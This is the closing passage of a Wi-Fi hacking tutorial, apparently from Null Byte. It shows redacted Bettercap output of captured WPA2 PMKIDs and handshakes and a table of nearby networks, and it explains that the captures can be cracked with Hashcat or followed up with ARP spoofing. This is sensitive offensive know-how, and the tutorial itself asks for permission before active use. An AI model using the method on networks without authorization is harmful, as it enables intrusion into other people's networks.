wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap

Now that we've tried both tools, let's take a look at our results with wifi.show. We should, if we're lucky, see more networks in red. While there are no colors below, five of them were indeed red.

wlan1  » wifi.show

+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| RSSI ▴  | BSSID       | SSID              | Encryption    | WPS | Ch | Clients | Sent  | Recvd  | Seen   |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| -55 dBm | ██:██:██:██:██:██ |                       | WPA2 (CCMP, PSK) | | 6  | 5       | 12 kB  | | 23:04:36 |
| -57 dBm | ██:██:██:██:██:██ | █████████████                 | WPA2 (CCMP, PSK) | | 6  | 1       | 6.5 kB | 66 B   | 23:04:34 |
| -63 dBm | ██:██:██:██:██:██ | ██████                        | WPA2 (CCMP, PSK) | | 11 | 2       | 1.2 kB | | 23:04:34 |
| -64 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (CCMP, PSK) | 2.0 | 5  | 2       | 7.1 kB | 128 B  | 23:04:32 |
| -90 dBm | ██:██:██:██:██:██ |                       | WPA2 (CCMP, PSK) | | 6  | | | | 23:04:36 |
| -71 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) | | 1  | 2       | 353 B  | | 23:04:35 |
| -72 dBm | ██:██:██:██:██:██ | ████████████████████████████  | WPA2 (CCMP, PSK) | | 6  | 1       | 4.9 kB | | 23:04:36 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, MGT) | | 6  | | | | 23:04:31 |
| -81 dBm | ██:██:██:██:██:██ | ████████████████              | WPA2 (CCMP, PSK) | | 11 | | | | 23:04:36 |
| -82 dBm | ██:██:██:██:██:██ | ████████████████████████      | WPA2 (CCMP, PSK) | | 7  | | | | 23:04:37 |
| -86 dBm | ██:██:██:██:██:██ |                       | WPA2 (CCMP, PSK) | | 1  | | | | 23:04:31 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) | | 6  | | | | 23:04:32 |
| -86 dBm | ██:██:██:██:██:██ | ██████████████                | WPA2 (CCMP, PSK) | | 6  | | 670 B  | 384 B  | 23:04:32 |
| -86 dBm | ██:██:██:██:██:██ |                       | WPA2 (CCMP, MGT) | | 6  | | | | 23:04:31 |
| -87 dBm | ██:██:██:██:██:██ |                       | WPA2 (CCMP, PSK) | | 6  | | 759 B  | | 23:04:32 |
| -87 dBm | ██:██:██:██:██:██ | ████████████████████          | WPA2 (CCMP, PSK) | | 6  | | 228 B  | 1.2 kB | 23:04:34 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████   | WPA2 (CCMP, PSK) | 2.0 | 6  | | | | 23:04:34 |
| -88 dBm | ██:██:██:██:██:██ | ██████████████████            | WPA2 (CCMP, PSK) | | 8  | | | | 23:04:34 |
| -91 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (TKIP, PSK) | | 11 | | 1.7 kB | | 23:04:34 |
| -92 dBm | ██:██:██:██:██:██ | ██                            | WPA2 (CCMP, PSK) | 2.0 | 11 | | | | 23:04:38 |
| -92 dBm | ██:██:██:██:██:██ | ████████                      | WPA2 (TKIP, PSK) | | 11 | | | | 23:04:38 |
| -94 dBm | ██:██:██:██:██:██ | ██████████████████████████    | WPA2 (CCMP, PSK) | 2.0 | 6  | | | | 23:04:39 |
| -95 dBm | ██:██:██:██:██:██ | █████████████████             | WPA2 (CCMP, PSK) | | 11 | | | | 23:04:39 |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+

wlan1mon (ch. 12) / ↑ 45 kB / ↓ 8.9 MB / 38377 pkts / 3 handshakes

By running both modules, we were able to grab the information we need for five out of the ten closest Wi-Fi networks. That's pretty impressive. If we open the file Bettercap generated from these captures, we can see the information Bettercap has saved for us to crack in another program.

There we go! With Bettercap, we can capture the signals we need from Wi-Fi networks to brute-force weak passwords. You can follow our guide on handshake cracking with Hashcat to try brute-forcing the passwords.

Bettercap Is the Swiss Army Knife of Wi-Fi Hacking

Bettercap is an essential part of any hacker's toolkit, especially for the ability to run smoothly on low-cost devices like a Raspberry Pi. With Bettercap's ability to quickly discover low-hanging fruit like weak network passwords, you can use it to gain further access to devices on a network through ARP spoofing and poisoning in other Bettercap modules.

Make sure only to use the active modules of Bettercap on networks you have permission to use, but the recon modules are fine to use virtually anywhere. With enough patience, Bettercap will simply record handshakes when users connect to the network naturally, without needing to attack the network at all.

I hope you enjoyed this guide to using Betterecap to hack Wi-Fi networks! If you have any questions about this tutorial, there's the comments section below, and feel free to follow me on Twitter @KodyKinzie.

Don't Miss: How to Target Bluetooth Devices with Bettercap

Cover photo and screenshots by Kody/Null Byte




Source link